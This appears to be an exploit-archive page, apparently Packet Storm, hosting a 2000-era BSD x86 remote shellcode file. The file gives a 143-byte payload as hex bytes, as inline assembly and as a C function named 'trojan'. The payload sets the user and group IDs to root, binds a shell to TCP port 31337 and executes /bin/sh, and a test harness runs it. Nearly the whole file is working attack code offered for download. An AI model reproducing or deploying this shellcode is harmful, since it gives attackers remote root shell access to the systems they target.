what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

bsd-remote-shellcode.txt

bsd-remote-shellcode.txt
Posted Jan 25, 2003
Authored by Mayhem | Site devhell.org

Net/Free/Open/BSD x86 143 bytes shellcode which binds a shell on tcp port 31337 using setuid/setgid/socket/bind/listen/accept/dup2/exec("/bin/sh").

tags | shell, x86, tcp, shellcode
systems | bsd
SHA-256 | bf8402b782a35acb85ff1f23189281a35a0b1ce19ddcd28b4cd73329ccb099d7

bsd-remote-shellcode.txt

Change Mirror Download
/*
Here is a BSD remote shellcode.
Tested on NetBSD, FreeBSD and OpenBSD .
by mayhem (at devhell.org)
May 2000 - exile crew
143 bytes
*/

char shellcode[] =
"\x31\xC0"
"\x50"
"\x50"
"\xB0\x17"
"\xCD\x80" // setuid
"\x31\xC0"
"\x50"
"\x50"
"\xB0\xB5"
"\xCD\x80" // setgid
"\xEB\x60"
"\x5E"
"\x31\xC0"
"\x89\x46\x04"
"\x88\x46\x17"
"\x6A\x06"
"\x6A\x01"
"\x6A\x02"
"\xb0\x61"
"\x50"
"\xCD\x80" // socket
"\x89\xc7"
"\x31\xc0"
"\x6a\x10"
"\x56"
"\x57"
"\xb0\x68"
"\x50"
"\xCD\x80" // bind
"\x6A\x01"
"\x57"
"\xb0\x6A"
"\x50"
"\xCD\x80" // listen
"\x50"
"\x50"
"\x57"
"\xB0\x1E"
"\x50"
"\xCD\x80" //accept
"\x89\xc7"
"\x31\xDB"
"\x31\xc9"
"\xb1\x03"
"\x49"
"\x31\xc0"
"\xb0\x5A"
"\x51"
"\x57"
"\x50"
"\xcd\x80" // dup2
"\x39\xd9"
"\x75\xf2"
"\x31\xc0"
"\x89\x76\x18"
"\x89\x46\x1c"
"\x8D\x56\x1c"
"\x8D\x4E\x18"
"\x83\xc6\x10"
"\x52"
"\x51"
"\x56"
"\xb0\x3b"
"\x50"
"\xcd\x80" // execve
"\xe8\x9b\xff\xff\xff"
"\xc0\x02\x7a\x69\x90\x90\x90\x90\xc0\xd5\xbf\xef\xb8\xd5\xbf\xef"
"/bin/sh";






/*
** ASM shellcode
*/
fct()
{
__asm__("


xorl %eax, %eax
pushl %eax
pushl %eax
movb $0x17, %al
int $0x80

xorl %eax, %eax
pushl %eax
pushl %eax
movb $0xB5, %al
int $0x80



jmp data
code:
popl %esi
xorl %eax, %eax
movl %eax, 0x04(%esi)
movb %al , 0x17(%esi)

pushl $0x06
pushl $0x01
pushl $0x02
movb $0x61, %al
pushl %eax
int $0x80

movl %eax, %edi
xorl %eax, %eax
pushl $0x10
pushl %esi
pushl %edi
movb $0x68, %al
pushl %eax
int $0x80

pushl $0x01
pushl %edi
movb $0x6A, %al
pushl %eax
int $0x80

pushl %eax
pushl %eax
pushl %edi
movb $0x1E, %al
pushl %eax
int $0x80

movl %eax, %edi
xorl %ebx, %ebx
xorl %ecx, %ecx
movb $0x03, %ecx
loop:
decl %ecx
xorl %eax, %eax
movb $0x5A, %al
pushl %ecx
pushl %edi
pushl %eax
int $0x80
cmpl %ebx, %ecx
jne loop

xorl %eax, %eax
movl %esi, 0x18(%esi)
movl %eax, 0x1C(%esi)
leal 0x1C(%esi), %edx
leal 0x18(%esi), %ecx
addl $0x10, %esi
pushl %edx
pushl %ecx
pushl %esi
movb $0x3B, %al
pushl %eax
int $0x80

data:
call code
.string \"\xC0\x02\x7A\x69\x90\x90\x90\x90\xC0\xD5\xBF\xEF\xB8\xD5\xBF\xEF\"
.string \"/bin/sh\x90\"
");
}




/*
** Test
*/
main()
{
void (*fct)();

printf("shellcode lenght = %d bytes \n", sizeof(shellcode));
fct = (void *) shellcode;
fct();
}





/*
** C shellcode
*/
trojan()
{
int clientsock;
int serversock;
char *server;
char *args[2];

server = "\xC0\x02\x7A\x69\x00\x00\x00\x00\xC0\xD5\xBF\xEF\xB8\xD5\xBF\xEF";
args[0] = "/bin/sh";
args[1] = 0x00;
setuid(0);
setgid(0);
serversock = socket(0x02, 0x01, 0x06);
bind(serversock, server, 0x10);
listen(serversock, 0x01);
clientsock = accept(serversock, 0x00, 0x00);
dup2(clientsock, 0x02);
dup2(clientsock, 0x01);
dup2(clientsock, 0x00);
execve(args[0], args, args[1]);
}



Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close